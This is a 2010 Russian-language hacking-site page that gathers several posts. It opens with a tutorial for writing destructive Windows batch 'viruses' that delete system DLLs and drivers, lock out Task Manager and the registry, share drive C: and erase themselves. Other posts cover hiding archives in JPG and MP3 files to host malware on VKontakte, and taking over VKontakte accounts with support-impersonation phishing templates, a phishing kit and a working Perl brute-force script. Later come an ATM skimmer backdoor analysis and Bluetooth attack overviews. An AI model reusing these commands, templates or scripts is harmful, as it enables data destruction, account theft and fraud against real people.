Меню
Приветствуем новых
Связь с нами
           566078958
Категории раздела
Наш опрос
РЕКЛАМА
     СМС
Поиск

Главная » Разное
BAT - вирусы
Создание ВАТ-вирусов

В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только. Начнём мы с создания так называемых ВАТ-файлов или просто bat’ников, для этого нам понадобится всего лишь стандартный Блокнот Windows. Создаём файл *.txt и открываем его. Теперь нам нужно забить в него определённые команды, примеры которых вы видите ниже:

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del

del "%SystemRoot%system32*.dll" /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений

time 0:00 >nul – Поставить время на 00:00

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши

del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

shutdown -r -t 1 -c "lol" -f >nul – Форсираванная перезагрузка ПК

shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК

taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe

net share "ResName"="C:" >nul – Расшарить диск C:

label C:Диск >nul – Переименовать диск С:

msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК

del "%0" >nul – Самоликвидация вируса

А теперь комментарии. Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Также получившийся вирус может самоуничтожаться, для этого вместо пути к целевому файлу нужно ввести %0. Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение. Команда time просто устанавливает любое время на часах ПК. Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя. Команда
taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением. Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью. Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название. Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды. Теперь, когда вы записали необходимые вам команды, сохраните созданный *.txt с расширением *.bat
Также вы можете писать подобные вирусы не вручную, а используя специальные программы, автоматизирующие данный процесс. Могу порекомендовать одну такую программу, это BAT Virus Master. Спасибо за внимание, всех благ:)
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: xakep1983
  • Комментарии: (2)
    • И снова КОНТАКТ
    Привет всем! Сегодня мы поговорим на необычную тему. Мы постараемся слить несколько файлов в один, а потом еще и превратим известный сайт в наш файлообменник . Но сначала о том, что нам понадобится.

    Инструменты:
    1. WinHex – Hex editor. Программа от немецких разработчиков. Она еще не у вас? Тогда качать тут http://depositfiles.com/ru/files/3809608 (Здесь версия 14.7+keygen).
    2. Картинка JPG. Желательно малых размеров.
    3. mp3 файл. Опять же, малых размеров. (http://depositfiles.com/files/y8tondqz4)
    4. Архив WinRAR.

    5. Мозг и прямые руки (Идут в стандартной комплектации при рождении)))) Если что, ищите в гугл)))

    Немного теории.
    Начнем с краткого теоретического введения. Как то, шаря по нету, я наткнулся на описание файловой структуры JPG-картинки. Там было много неинтересного, но кое-чего полезного. Дело в том, что у файла JPG есть особенность. Все, что находится после последнего блока файла, игнорируется. То есть, теоретически, в конец картинки можно поместить что угодно, и на ее работоспособность это никак не повлияет. Берем на заметку! Хм… Меня это заинтересовало. Я пошел дальше. Теперь направленно начал искать структуру файлов WinRAR’а. Нашел. Опять много лишнего. Но есть и то, что нас интересует! Дело в том, что в начале каждого файла находится указатель, который сообщает о начале архива. А все что перед указателем – игнорируется!! Все. Теории на сегодня достаточно. К делу!

    Практика.
    Открываем скаченный WinHex. Я бы посоветовал вам его установить. В архиве есть KeyGen. Запускаем его, нажимаем на Gen и копируем получившуюся инфу. Запускаем WinHex. Заходим в меню Help Register и вставляем нашу инфу. Жмем ОК. Все. Теперь пользуемся на здоровье. На самом деле WinHex великая вещь, но в этой статье я не буду описывать его функции( Теперь перетаскиваем подготовленный вами архив в пустое окно редактора. Наблюдаем байтовую сетку. В маленьком окне рядом виднеются непонятные знаки. Жмем Ctrl+A и потом Ctrl+C. Отлично. Мы скопировали архив. Теперь перетаскиваем в это же окно JPG файл. Идеально, если бы он весил около 50 кб. Ставим указатель в конец сетки JPG и нажимаем Ctrl+V. Отвечаем да на вопросы. Отлично. Мы добавили файл WinRAR к JPG и не нарушили файловую структуру. Сохраняем получившееся чудо. Лучше под тем же именем но в другой папке. Если имя будете менять, то не забудьте дописать .jpg. Идем в папку с сохраненным файлом. Открываем его. Так. Картинка открылась. Теперь на файл правой кнопкой открыть с помощью WinRAR. И что же мы видим!!!! Открывается архив с файлами, в который можно добавлять что угодно, ставить пароли, в общем, использовать как полноценный архив! Это все, безусловно, очень интересно, но у меня есть идея получше….

    Файлообменник для хакеров?? ВКонтакте.ру!!!
    Вот и подошли к самому интересному. Есть такой популярный сайт – Vkontakte.ru. Я думаю всем он знаком. И все знают, что там можно добавлять музыку…. Хм… Это нам очень пригодится. Хотя бы пользы поимеем с Контакта) Начнем, пожалуй! Снова идем в WinHex. Теперь открываем приготовленную нами мелодию в формате mp3. Мой совет. В Winamp есть стандартная мелодия Demo.mp3(38 кб). Я буду говорить о ней. И так. Открываем ее редактором. Теперь включаем то, что я вы должны были подготовить последним пунктом. МОЗГ. Нам нужно вставить архив так, чтобы не нарушить файловую структуру mp3. И в то же время так, чтобы работал архив. Да еще и система ВКонтакте отметает нехорошие фалы mp3))) Я в принципе много пробовал.… Пока до меня не дошло.…Если внимательно посмотреть в то окно, где раньше были непонятные символы, то можно кое-что увидеть. А увидим мы вот такую строку: http://www.cddb.com/id3/taginfo1.html (это в файле demo.mp3). По всей видимости, это подпись источника. Вот она-то нам и нужна. Выделяем диапазон с байта 68 по 6С (нулевой байт, который обозначается точкой, нам трогать не к чему ). Нажимаем правой кнопкой>Edit>Remove. Теперь нажимаем Ctrl+V (если вы не закрывали редактор) или заново открывайте архив и копируйте всю его сетку. На вопросы WinHex отвечайте положительно. Теперь осталось лишь сохранить файл. Как это сделать, я думаю, вы знаете.
    Теперь проверяем файл. Открываем, проигрыватель ругается, но мы отвечаем да, и файл воспроизводится!!! Теперь открываем его с помощью WinRAR. И здесь все отлично! Теперь осталось лишь проверить, будет ли Контакт ругаться на него. Следует заметить, что не зря для вставки был выбран именно заголовок. Ведь с точки зрения ПК мы ничего не нарушили. Мы всего лишь написали свой заголовок. Ну и что, что большой?)) Заливаем песню в Контакт. Файл загрузился без ошибок!!! Ура. Теперь осталось лишь скачать файл. Есть много способов. Можно воспользоваться программой vksaver (http://vseokontakte.ru/wp-content/uploads/2009/02/vksaver-install.exe). Перед ее установкой надо закрыть все браузеры. После установить программу. Теперь, когда вы находитесь на странице с мелодиями, под каждым аудио файлом появляется кнопка Save. После ее нажатия вы перейдете на страницу скачки. Там правой кнопкой по надписи скачать, и выбираем сохранить объект как…В Vksaver есть конфликт с FireFox. На третьей версии не пробовал, но с первой яркая несовместимость. После скачки проверяем работоспособность нашей адской конструкции))) Действительно, все работает! Можно праздновать победу!!!


    Заключение.
    Хочется сказать лишь пару слов. Надо бы объяснить, почему я назвал такой обмен файлами «хакерским». Дело в том, что на размер файла есть ограничение. Не больше 10 мб. Это как раз подходит для неплохой подборки вирусов и крипторов. И самое главное. С других файлообменников файлы часто удаляют. А много ли у вас мелодий из контакта удалили??? Вот то-то же))))) К сожалению, с видео такое не пройдет. Я нашел «уязвимость» в файле формата 3gp и залил в Контакт. Вот только потом вспомнил, что все видео в Контакт кодируются. И вся наша система летит к чертям((

    З.Ы. Не стоит ругаться, если я как-то неверно назвал некоторые процессы или объекты. С WinHex я почти не работаю, а здесь уж очень мне идея приглянулась.
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: profi
  • Комментарии: (1)
    • Взлом вконтакте, контакта, vkontakte.ru
    Введение

    В данный момент очень популярны, стали соц. сети. В этой статье мы рассмотрим одну из них vkontakte.ru.
    Очень много людей просят взломать страницу, из своих личных побуждений.
    Над такими проектами работают профессионалы, и найти баг уже в состоявшем проекте почти нереально, но всё же редко что то всплывает и поэтому новичку, который нечего не знает, взломать будет НЕРЕАЛЬНО в любом случаи, потому что там сидят далеко не тупые люди и ни кто вам бесплатно помогать, так что смиритесь.

    Для тех, кто понимает, о чём я, продолжаем.

    ID это как уник. код юзера, то есть, например серийный номер машины.
    Узнать его вы можете, зайдя в вконтакт, например, так выгладит ваша главная страница профиля http://vkontakte.ru/id5185**6?31892
    ID получится 5185**6, то есть, то, что начинается от id и то знака ?. Если нету знака ? то идёт до конца.

    Некоторые способы взлома:

    1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
    "
    Здравствуйте.
    В связи с очень высоким количеством пользователей в нашей системе,
    идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
    вам необходимо на него ответить в такой форме:

    EM: Ваш email в vkontakte.ru.
    PA: Ваш пароль в vkontakte.ru.
    Пример:
    EM: pavel_durov@mail.ru
    PA: 123456

    Чтоб не было путаницы, в теме письма укажите тему "Обновление".

    Приносим извинения за неудобства.
    ".
    Или типа этого, импровизируйте.
    2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb] (cкачиваний: 19107)
    3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
    "
    Здравствуйте.
    В связи с очень высоким количеством пользователей в нашей системе,
    идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
    В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.

    Приносим извинения за неудобства.
    ".
    Или типа этого, импровизируйте.
    4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.


    Vkontakte.Ru Brute [FinaL]
    Брутфорс акков вконтакте.ру
    Сам скрипт брута (Perl):



    #!/usr/bin/perl

    use IO::Socket;
    use MD5;
    use threads;
    use threads::shared;
    my @pass : shared;

    ######################################
    # C!klodoL
    # vkontakte.ru bruteforce with multi-threads
    ######################################
    $dic = 'passl.txt'; #словарь паролей
    $id = 111111; #id цели
    $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
    $threads = 4; #количество потоков
    ######################################

    open (pass, "<$dic");

    Next:
    @pass = pass();

    for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
    for(@trl) { $_->join; }

    sub Brut
    {

    while (@pass){

    $pass = shift @pass;

    $md5 = MD5->hexhash($pass);
    $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
    print $sock "HEAD http://vkontakte.ru/ HTTP/1.0rn".
    "Host: vkontakte.rurn".
    "Accept: */*rn".
    "Content-Type: application/x-www-form-urlencodedrn".
    "User-Agent: Mozillorn".
    "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn".
    "Connection: closernrn";
    $answ = <$sock>;
    close $sock;
    print "$pass $answ";
    if ($answ =~ /302/){
    open (good, '>>good.txt');
    print good "$id:$pass:$md5n";
    print "$id:$pass:$md5n";
    close good;
    exit;}
    }

    }

    goto Next;

    sub pass
    {
    my (@mas);
    while (){
    push @mas, $_;
    last if (@mas == 400);
    }
    chomp @mas;
    return @mas;
    }


    --------------------------------------------------------------------------------



    Цитата:

    --------------------------------------------------------------------------------
    $dic = 'passl.txt'; #словарь паролей
    $id = 111111; #id цели
    $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
    $threads = 4; #количество потоков
    --------------------------------------------------------------------------------


    Как запустить скрипт:

    Цитата:

    --------------------------------------------------------------------------------
    1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
    2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
    3. переименовываем файл из brute.txt в brute.pl
    4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
    5. запускаем файл, и радуемся...
    6. создастся good.txt, где и будет ваш пасс.


    Vkontakte bruteforce ©serber
    vkontakte_bruteforce.rar

    или
    vkontakte.exe

    Словари тут.
    5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте na-s.ru. Такие уязвимости очень дорого стоят, и выкладывать их нет смысла просить, тем более паблик уязвимости проживут сутки не более.

    Ну, вот мы рассмотрели 5 способов как можно взломать страницу вконтакте.

    Если до сих пор не поняли, не судьба :) Лучше мирно сидите там дальше вконтакте.
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: Админ
  • Комментарии: (1)
    • Diebold.Backdoor.Win32.Skimer.a
    основной исполняемый файл содержит троянский код, обрабатывающий магнитные карты с использованием незарегестрированных функций Diebold Agilis 91x, анализирует операции в различной валюте и похищает полученные данные. Затем данные могут печататься на чеке. Также есть уверенность в хищении PIN-кодов. В целом, есть подозрение в том, что код был написан человеком, хорошо знакомым с устройством банкоматов Diebold.Backdoor.Win32.Skimer.a (ЛК) не способен распространяться между компьютерами, поэтому также бытует мнение, что его "имплантируют" локально.

    Если банкомат файловой системы NTFS, создаются файлы:
    % WINDIR% greenstone.bmp: redstone.bmp
    % WINDIR% greenstone.bmp: bluestone.bmp
    В противном случае:
    % WINDIR% redstone.bmp
    % WINDIR% bluestone.bmp
    Эти файлы создаются из этих копий файлов:
    % WINDIR% trl2
    % WINDIR% KL
    затем корректируются привилегии до уровня "SeDebugPrivilege" и происходит 50 попыток прекратить процесс Lsass.exe.

    Backdoor Устанавливает себя следующим образом:
    извлекает полный путь к файлам в службе "LogWriter"
    останавливает "LogWriter"
    прибавляет в конце ":" и pwrstr.dll
    кладёт PACKAGEINFO в [LogWriter_binary_filename]: pwrstr.dll
    пуск службы "LogWriter" - запускает pwrstr.dll с новым ADS-именем

    В конце прикрепляет к процессу explorer.exe новые потоки с вредоносным кодом, которые перечислены и удаляет все временные файлы Windows.
    После активации, "сброшенная" DLL будет внедрять два потока: один будет выведен в процесс mu.exe, другой - в процесс SpiService.exe, основным сервисом ( "Diebold XFS службы") из ПО, которое работает на Diebold. Эти потоки будут отвечать за процесс связи с драйвером Diebold через pipe ".pipelsndbd".
    Ещё один поток будет непрерывно вызывать API SQReceiveFromServer (), экспортируемой sharedq.dll, один раз в секунду. Содержимое буфера эта функция будет затем анализировать на наличие метки "TCS," и "HST,".
    Если какие-либо значения, указанные в этих тегах, присутствуют через разделитель ";", они будут извлечены и записаны в ADS% WINDIR% greenstone.bmp: redstone.bmp в NTFS, либо в файл % WINDIR% redstone.bmp на иной файловой системе.
    Злоумышленник может воспользоваться любой из 10 возможных команд, вызывающих определённые действия, введя номер на клавиатуре банкомата.
    Например, команда "2" будет читать версию установленного программного обеспечения из реестра:
    HKLM SOFTWARE Diebold Agilis 91x Основные
    HKLM SOFTWARE Diebold Agilis 91x
    Затем эта команда будет читать содержимое временных файлов / ADS redstone.bmp и bluestone.bmp и подробности сделки из этих журналов. Наконец, она будет показывать окно сообщения с собранной статистикой:

    Agilis [номер версии]
    Агент [номер версии]
    Сделки [количество]
    Карты [количество]
    KEYS [количество]

    Для предотвращения последующих атак на банкоматы рекомендуется:

    1. Централизованное автоматизированное обновление OS Windows на банкоматах
    2. Централизованное автоматизированное обновление антивирусного ПО банкоматов
    3. Обязательное использование софтовых профессиональных firewall-ов на банкоматах
    Спасибо:
    http://blog.threatexpert.com/2009/03/effect-of-credit-crunch-on-backdoors.html и http://www.sophos.com/security/blog/2009/03/3577.html.
    Интересный факт - http://www.securitylab.ru/news/376519.php. Один в один и даже источник не указали.
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: xakep1983
  • Комментарии: (0)
    • Bluetooth-хакерство
    Когда Адам Лаури, сотрудник одной из компаний, занимающейся вопросами беспроводной безопасности, вечером идет гулять по Лондону, никто не догадывается, чем он занимается на прогулке, а занимается он прослушиванием сотовых телефонов. Точнее, делает это не он сам, а его ноутбук, снабженный специальной антенной и спрятанный в сумке. Ноутбук сканирует диапазон частот 2,4 ГГц, в котором работают Bluetooth-устройства. С помощью своего ноутбука Лаури может проникнуть в любой телефон, попадающий в сферу действия его антенны, но это не входит в его планы. Он просто хочет оценить, какое количество телефонов он может взломать через технологию Bluetooth, с помощью которой телефоны общаются с наушниками, компьютерами и другими устройствами. За 17 минут прогулки Лаури поймал сигналы от 39 телефонов. Всего за 15 секунд он может скачать оттуда всю записную книжку.
    Пять телефонов были полностью открыты для любой атаки. Под словом атака здесь понимается любое несанкционированное действие - прослушивание разговоров, изменение телефонных номеров в адресной книге или даже осуществление международных звонков. Мало кто задумывается о том, что стремительно растет число технических и программных средств для проникновения в мобильные телефоны, включая и вирусные атаки. Один из таких Bluetooth-червей уже был запущен в действие в Сингапуре, и, по мнению Лаури, их число и сложность будут расти. Особенно уязвимы в этом отношении европейцы, которые пользуются своими мобильными телефонами для совершения микроплатежей - небольших покупок, счета за которые приплюсовываются к телефонному счету. Опытный изготовитель вирусов может воспользоваться этим при помощи заказов «обратными SMS». Bluetooth-безопасность стала серьезной проблемой в Европе, где эта технология широко распространена, и постепенно перебирается в США. Однако с ней можно разобраться: производители терминалов могут переписать неправильные приложения, а пользователей можно научить, как быть внимательными. Гораздо более серьезная проблема для США - это Интернет-телефония, которая быстро становится популярной у больших корпораций и конечных пользователей.

    Передача голоса по IP-протоколу по сути своей очень уязвима. Никто из серьезных преступных группировок просто не задумывался, сколько миллионов долларов можно извлечь из такого мошенничества. Но когда они поймут это, противостоять им будет очень нелегко, и это не удастся сделать несколькими «заплатками» в программах. Технически Bluetooth-хакерство сильно отличается от VoIP-хакерства, но они оба опасны по одной и той же причине. Телефоны все больше становятся похожи на компьютеры, это делает их более полезными, но и более уязвимыми. Возможности VoIP позволяют пользователю портировать свой телефонный номер, где угодно упаковывать свои голосовые послания в MP3-формат и получать их в виде электронных писем, делать дешевые международные звонки. И VoIP, и Bluetooth делают телефон подверженным всем «болезням» компьютеров - червям, спаму и вирусам. Брюс Шнайер, автор известной книги «Ложь и секреты: цифровая безопасность в сетевом мире», отмечает, что «телефонные сети научились заботиться о своей безопасности, а вот VoIP-телефоны остаются такими же уязвимыми, как компьютер».
    Большая часть современных хакерских штучек срабатывает, поскольку традиционные телефонные системы всегда контролировались крупными монополистами и работали по их правилам. Это давно уже не так; телефонные сети могут управляться и контролироваться теми, кто хорошо разбирается в компьютерных сетях. Лучше всех во всем этом разбирается новое поколение телефонных хакеров – «фрикеры» (phreakers), которые совершенно не хотят следовать правилам. Они буквально на мелкие кусочки разбирают новейшие мобильные телефоны, чтобы понять, как их недочеты можно использовать в собственных интересах. Телефонные компании и производители оборудования погружены в свои проблемы и неповоротливы, поэтому нам остается надеяться только на то, что добрые фрикеры найдут способы защиты от атак раньше, чем злые фрикеры уничтожат всех нас. После своего первого опыта во время прогулки по улицам Лондона, Лаури проделал аналогичную операцию уже в здании парламента, где у него была возможность (которой он не воспользовался) скопировать адресную книжку и дневник нескольких известных политиков. Эта его прогулка по зданию парламента привела к тому, что в этом здании было запрещено пользоваться Bluetooth-устройствами. Ларри изобрел хакерскую технологию bluesnarfing, которая использует технологию Bluetooth для доступа к данным, содержащимся в сотовых телефонах. Атака типа bluesnarfing выявляет незащищенный телефон и копирует всю его адресную книгу, календарь, фото - в общем, все, что там можно найти.
    С помощью этой атаки можно с захваченного телефона посылать любые послания. Как честный человек, он готовит серьезную статью, подробно разъясняющую опасность открытых Bluetooth-соединений. Атаку bluesnarfing Лаури разработал в процессе серьезного изучения программ, управляющих Bluetooth-гарнитурой в телефонах, которыми пользовались его коллеги. Он был очень недоволен тем, что обнаружил. «Куча дыр в системе безопасности», - таким был его краткий вывод.
    После того, как телефонные компании отказались выслушать его рассказ о проблемах, он решил сделать bluesnarfing достоянием публики, чтобы всем стало известно, как опасно пользоваться Bluetooth-телефонами. Теперь представьте, настолько возрастает опасность, когда техническая уязвимость Bluetooth-устройств дополняется той беззаботностью, с которой люди пользуются ею. Большинство людей оставляют функцию Bluetooth включенной постоянно, и часто делают это потому, что не знают, как ее отключить. Любители технологических «примочек» оставляют ее всегда включенным сознательно, потому что они слышали о том, что через Bluetooth-интерфейс часто посылаются различные письма в поисках партнеров по флирту. В надежде на новые знакомства они рискуют гораздо больше.

    Риск не исчерпывается атакой bluesnarfing. Еще один способ использования Bluetooth-технологии для того, чтобы полностью завладеть телефоном называется bluebugging. Вот в чем он состоит: если запустить специальную bluebug-программу на ноутбуке (снабженном антенной), она отыщет поблизости уязвимый телефон, проникнет в него и может отдать команду позвонить куда угодно. Этот тип атаки изобрел австрийский инженер Мартин Херфурт совсем недавно. Bluebugging - это отличное оружие для промышленного шпионажа. Если у кого-то возникает желание поприсутствовать невидимо на встрече руководителей конкурирующей компании, он может при помощи технологии bluebugging проникнуть в один из телефонов того, кто участвует в этой встрече, и дать команду позвонить на свой телефон. После этого можно будет (хоть и не полностью разборчиво) слушать все, что будет сказано на этой важной встрече.
    «Сотовый телефон - прекрасное изобретение для шпионажа», - считает Лаури. Сотовые компании утверждают, что bluesnarfing и bluebugging не являются серьезными угрозами, потому что Bluetooth-интерфейс работает на расстоянии 5- 10 м , а, значит, атакующие должны подходить к мишени совсем близко. Однако специальное Bluetooth-ружье под названием snipper (которое стоит около 200 долл.) может работать на расстоянии до 500- 700 м . С такого расстояния можно достать куда угодно, даже до Белого дома в Вашингтоне. Bluetooth-хакерство только начинается. Дыры в программах можно залатать, но проблема не исчезнет, поскольку все мастерство хакеров, отточенное за десятки лет их работы в Интернете, теперь переориентируется на мобильную телефонию. А ведь у терминалов самого ближайшего будущего будет несколько точек атаки: если хакер не сможет проникнуть в телефон через порт Bluetooth, он попробует Wi-Fi-порт, а потом и инфракрасный порт...
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: Админ
  • Комментарии: (0)
    • Bluetooth-атаки и способы защитится от них
    Технология ближней радиосвязи Bluetooth, появившись в далёком 1999 году, за прошедшие 7 лет обрела неслыханную популярность. Телефоны и КПК с bluetooth уже не редкость — теперь технологией оснащаются не только «топовые» модели, но и устройства среднего ценового диапазона.

    Студенты и школьники кидаются друг в друга картинками, мелодиями и играми, всё больше людей покупает беспроводные гарнитуры, а провода постепенно уходят в прошлое…

    Однако при всех плюсах Bluetooth, есть у него 3 огромных минуса: невысокая дальность действия, низкая (в сравнении с тем же wi-fi) скорость и огромное количество мелких и не очень «глюков». И если с первыми двумя недостатками можно мириться или бороться, то количество недоработок заставляет поразиться любого, даже далёкого от высоких технологий человека.

    Есть несколько разных видов атак на bluetooth-устройства, начиная от безобидных (типа BlueSnarf), кончая полноценными DoS-атаками, международными звонками без ведома владельца телефона и просто похищением СМС (BlueBug).

    BlueBug

    Данный вид атаки позволяет получить доступ к выполнению AT-команд на сотовом телефоне, что может привести к чтению и отправке СМС, полному доступу к телефонной книге, и многому другому. Возможности атаки почти ничем не ограничены. Так например, у автора, в образовательных целях естественно, получилось скачать с одного из телефонов всю записную книгу, все смс, установить на нём переадресацию входящих вызовов и заставить набрать номер телефона техподдержки оператора.
    Полный список всех возможностей этого вида атаки займёт не один килобайт текста и ограничен лишь фантазией и познаниями атакующего.

    Уязвимые устройства
    Любой сотовый телефон с поддержкой bluetooth.

    Как защититься
    Методы защиты весьма просты — владельцам самых старых телефонов с BT (если такие ещё есть) необходима перепрошить аппарат (благо исправленная прошивка давно доступна), остальным же необходимо включить защиту соединения bluetooth и отклонять подозрительные запросы на соединение.

    BlueSmack

    Принцип этой атаки стар как windows 95. Неудивительно, ведь в те времена эта атака называлась Ping of Death и предназначалась «счастливым» пользователям windows 95. С тех пор много воды утекло, однако принцип атаки остался. В результате если отправить длинный пакет, например с помощью утилиты l2ping, входящей в состав пакета BlueZ, то целевое устройство может «повиснуть» или самопроизвольно перезагрузиться.

    Как защититься
    Пользователям старых устройств опять же поможет смена ОС, современные устройства к атаке невосприимчивы.

    BlueSnarf

    Пожалуй, самая популярная атака на устройства bluetooth.
    В этой атаке, впервые представленной публике в 2003 году, используется сервис OPP (OBEX Push Profile), который используется для упрощенного обмена «визитками» и прочими файлами, и при нормальных обстоятельствах работает вполне стабильно. Однако чаще всего для доступа к этому сервису не требутся авторизация, что, кстати тоже не является проблемой. Главная проблема состоит в том, что если прошивка написана не совсем верно, атакующий может скачать любой существующий файл командой GET, а это может быть например '/telecom/pb.vcf' (в этом файле хранится телефонная книга устройства).

    Уязвимые устройства
    Большинство SonyEricsson (кроме смартфонов), ранние модели Nokia, многие Siemens. Некоторые КПК.

    Как защититься
    Установить обязательную авторизацию для OPP и не принимать неизвестные запросы.

    Bluesnarf++

    Развитие идеи bluesnarf, позволяющее получить полный (RW) доступ к файловой системе устройства, включая карты памяти, виртуальные и RAM диски и т.п. Вместо малофункционального OPP используется OBEX FTP (со всеми возможностями протокола FTP), к которому можно подключиться без авторизации.

    Уязвимые устройства
    Многие Siemens, Samsung, SonyEricsson, и т.п. Nokia не восприимчивы к этой атаке.

    Как защититься
    Авторизация, не принимать подозрительные соединения, обновить прошивку.

    HeloMoto

    Как можно понять из названия, атака затрагивает телефоны Motorola. Суть в следующем: атакующий соединяется с сервисом OPP жертвы (не требуется авторизация), имитирует посылку «визитки» и разрывает соединение, не закончив его. В результате, в списке «доверенных устройств» жертвы появляется телефон атакующего, что даёт возможность соединиться с сервисом гарнитуры (Headset) и выполнять AT-команды (Атака BlueBug).

    Уязвимые устройства
    Все телефоны Motorola.

    Как защититься
    Установить защиту соединения.
    Поскольку на телефонах Motorola максимальная длительность нахождения Bluetooth в режиме обнаружения составляет всего 60 секунд, владельцам можно не беспокоиться. Шанса встретить хакера в момент уязвимости телефона практически нет.

    BlueDump (Re-Pairing attack)

    Эта достаточно серьёзная атака основана на методе «подделки» BT-MAC адреса с целью получить привилегии настоящего обладателя MAC. Лучше всего пояснить на примере.
    Допустим, есть 3 устройсва с Bluetooth — 2 из них находятся в доверительных отношениях, третье — устройство злоумышленика. Если злоумышленик знает MAC адреса прервых двух устройств, ему достаточно дождаться выхода одного из устройств из зоны действия, присвоить себе его MAC и инициировать повторное «спаривание» с оставшимся устройством. Это становится возможным из-за того, что одно из устройств может «забыть» link key, которым шифруется передача данных и запросить его повторную генерацию.

    Уязвимые устройства
    Все устройства bluetooth.

    Как защититься
    Никак. На данный момент эта уязвимость неизлечима. Однако, не всё так плохо — ведь без знания адреса доверенного устройства злоумышленик не сможет ничего сделать — перебрать все возможные адреса за небольшой промежуток времени невозможно.

    CarWhisperer

    Атака на автомобильные магнитолы с bluetooth, которая становится возможной из-за использования производителем стандартного и, как правило, неизменяемого pin-кода вроде 0000 или 1234.
    Соединение происходит совершенно прозрачно для владельца автомобиля, после чего телефон(кпк/ноутбук…) работает с магнитолой как с обычной гарнитурой.

    Уязвимые устройства
    Нет данных.

    Как защититься
    Нет данных.

    DoS-атаки с использованием bss (bluetooth stack smasher)

    Этот тип атак использует неправильно сформированные L2CAP пакеты для выключения/зависания/перезагрузки атакуемого устройства. С различными параметрами уязвимы следующие устройства: Nokia N70, SonyEricsson T68i, W800i, K600i и другие модели.

    Как защититься
    Защититься от такой атаки пока невозможно, в будущем скорее всего поможет смена прошивки.

    Выводы:

    Как можно заметить, многие уязвимости присущи любым устройствам, однако не стоит волноваться по этому поводу.
    На это есть 2 причины:
    Первая — радиус действия bluetooth слишком мал, соответственно для атаки необходимо быть в зоне прямой видимости.
    Вторая — все устройства позволяют включить защиту bluetooth или по крайней мере стать «невидимым» для остальных.

    Преупреждён — значит вооружен, а знание пары простых правил позволит избежать многих опасностей. Достаточно не отключать защиту bluetooth и не давать подозрительным устройствам авторизации.

    А ещё — не бойтесь обмениваться файлами по bluetooth — ведь ни один существующий вирус не установится на ваше устройство без разрешеня.
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: xak
  • Комментарии: (0)
    • Путь
